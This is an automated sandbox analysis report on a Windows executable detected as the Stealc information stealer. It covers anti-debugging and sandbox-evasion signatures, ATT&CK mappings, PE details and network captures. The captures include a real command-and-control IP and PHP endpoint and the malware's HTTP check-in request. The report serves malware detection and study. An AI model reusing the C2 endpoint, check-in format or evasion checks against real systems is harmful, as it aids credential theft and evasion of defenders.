                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13411
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D345C0 VirtualProtect ?,00000004,00000100,000000000_2_00D345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49750 mov eax, dword ptr fs:[00000030h]0_2_00D49750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00D478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D49600
                Source: file.exe, file.exe, 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D47B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00D47980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D47850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D47A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2228, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php~file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpBfile.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phprfile.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/Cfile.exe, 00000000.00000002.2120585250.0000000000902000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpofile.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpFfile.exe, 00000000.00000002.2120585250.0000000000934000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1526104
                            Start date and time:2024-10-04 18:55:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 80
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            niko.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            niko.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.103
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            Setup.exeGet hashmaliciousRedLineBrowse
                            • 185.215.113.22
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948017377484882
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'833'472 bytes
                            MD5:5e8286d88eeff93b753e7454a6b431fd
                            SHA1:9cd9b91b5dd298a811d922714c506581e7c27b96
                            SHA256:9c62b127d6790b9b7957057a75441bc1a4e5eaf4f5c6c2669e833154739adb00
                            SHA512:ae137bf10ad26dea6ba088903aab92dfe1a67626549adb92665f77bba791f9403f8ea49b30200663c898cb54ac96725ca29f96d233482927683812cc103f8fdf
                            SSDEEP:49152:wmr6UD38hhPKt/mY9nb5VwuUDhblam9LLV:wa64IJwV9ERxlZLh
                            TLSH:E685339B1E3721A7C4C7E57A429FE29F7CF91CA5F4B01A4C1202DD395AA3D0C376A825
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa93000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FC83CAD2E9Ah
                            psubusb mm3, qword ptr [ebx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [edx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800619932b15396eab894f4fdca7a9af7e3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x29a0000x200c775d09d08a32b20b0107132327b150bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            uygwklsw0x4f80000x19a0000x1996000f79664a9d4b7fa4831e1d5431757ab9False0.9949165076335877data7.954033280427647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            sowhbkpg0x6920000x10000x6004e2fa459a9fbb33f15899b6459d90d76False0.5611979166666666data4.913249727106167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6930000x30000x2200bf788d5ec35a2820a23aab1ed7d69e34False0.08168658088235294DOS executable (COM)0.8890519630107065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-04T18:56:06.423122+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 4, 2024 18:56:05.490628004 CEST4970480192.168.2.5185.215.113.37
                            Oct 4, 2024 18:56:05.496113062 CEST8049704185.215.113.37192.168.2.5
                            Oct 4, 2024 18:56:05.496289968 CEST4970480192.168.2.5185.215.113.37
                            Oct 4, 2024 18:56:05.496467113 CEST4970480192.168.2.5185.215.113.37
                            Oct 4, 2024 18:56:05.501353025 CEST8049704185.215.113.37192.168.2.5
                            Oct 4, 2024 18:56:06.188127041 CEST8049704185.215.113.37192.168.2.5
                            Oct 4, 2024 18:56:06.188199997 CEST4970480192.168.2.5185.215.113.37
                            Oct 4, 2024 18:56:06.191490889 CEST4970480192.168.2.5185.215.113.37
                            Oct 4, 2024 18:56:06.196429014 CEST8049704185.215.113.37192.168.2.5
                            Oct 4, 2024 18:56:06.422909975 CEST8049704185.215.113.37192.168.2.5
                            Oct 4, 2024 18:56:06.423121929 CEST4970480192.168.2.5185.215.113.37
                            Oct 4, 2024 18:56:10.799527884 CEST4970480192.168.2.5185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549704185.215.113.37802228C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 4, 2024 18:56:05.496467113 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 4, 2024 18:56:06.188127041 CEST203INHTTP/1.1 200 OK
                            Date: Fri, 04 Oct 2024 16:56:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 4, 2024 18:56:06.191490889 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 44 45 44 30 38 33 45 39 35 30 33 30 31 32 33 34 33 35 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 2d 2d 0d 0a
                            Data Ascii: ------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="hwid"22DED083E9503012343576------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="build"doma------DHDAFBFCFHIDAKFIIEBA--
                            Oct 4, 2024 18:56:06.422909975 CEST210INHTTP/1.1 200 OK
                            Date: Fri, 04 Oct 2024 16:56:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:12:56:01
                            Start date:04/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xd30000
                            File size:1'833'472 bytes
                            MD5 hash:5E8286D88EEFF93B753E7454A6B431FD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13234 d469f0 13279 d32260 13234->13279 13258 d46a64 13259 d4a9b0 4 API calls 13258->13259 13260 d46a6b 13259->13260 13261 d4a9b0 4 API calls 13260->13261 13262 d46a72 13261->13262 13263 d4a9b0 4 API calls 13262->13263 13264 d46a79 13263->13264 13265 d4a9b0 4 API calls 13264->13265 13266 d46a80 13265->13266 13431 d4a8a0 13266->13431 13268 d46a89 13269 d46b0c 13268->13269 13272 d46ac2 OpenEventA 13268->13272 13435 d46920 GetSystemTime 13269->13435 13274 d46af5 CloseHandle Sleep 13272->13274 13275 d46ad9 13272->13275 13276 d46b0a 13274->13276 13278 d46ae1 CreateEventA 13275->13278 13276->13268 13278->13269 13632 d345c0 13279->13632 13281 d32274 13282 d345c0 2 API calls 13281->13282 13283 d3228d 13282->13283 13284 d345c0 2 API calls 13283->13284 13285 d322a6 13284->13285 13286 d345c0 2 API calls 13285->13286 13287 d322bf 13286->13287 13288 d345c0 2 API calls 13287->13288 13289 d322d8 13288->13289 13290 d345c0 2 API calls 13289->13290 13291 d322f1 13290->13291 13292 d345c0 2 API calls 13291->13292 13293 d3230a 13292->13293 13294 d345c0 2 API calls 13293->13294 13295 d32323 13294->13295 13296 d345c0 2 API calls 13295->13296 13297 d3233c 13296->13297 13298 d345c0 2 API calls 13297->13298 13299 d32355 13298->13299 13300 d345c0 2 API calls 13299->13300 13301 d3236e 13300->13301 13302 d345c0 2 API calls 13301->13302 13303 d32387 13302->13303 13304 d345c0 2 API calls 13303->13304 13305 d323a0 13304->13305 13306 d345c0 2 API calls 13305->13306 13307 d323b9 13306->13307 13308 d345c0 2 API calls 13307->13308 13309 d323d2 13308->13309 13310 d345c0 2 API calls 13309->13310 13311 d323eb 13310->13311 13312 d345c0 2 API calls 13311->13312 13313 d32404 13312->13313 13314 d345c0 2 API calls 13313->13314 13315 d3241d 13314->13315 13316 d345c0 2 API calls 13315->13316 13317 d32436 13316->13317 13318 d345c0 2 API calls 13317->13318 13319 d3244f 13318->13319 13320 d345c0 2 API calls 13319->13320 13321 d32468 13320->13321 13322 d345c0 2 API calls 13321->13322 13323 d32481 13322->13323 13324 d345c0 2 API calls 13323->13324 13325 d3249a 13324->13325 13326 d345c0 2 API calls 13325->13326 13327 d324b3 13326->13327 13328 d345c0 2 API calls 13327->13328 13329 d324cc 13328->13329 13330 d345c0 2 API calls 13329->13330 13331 d324e5 13330->13331 13332 d345c0 2 API 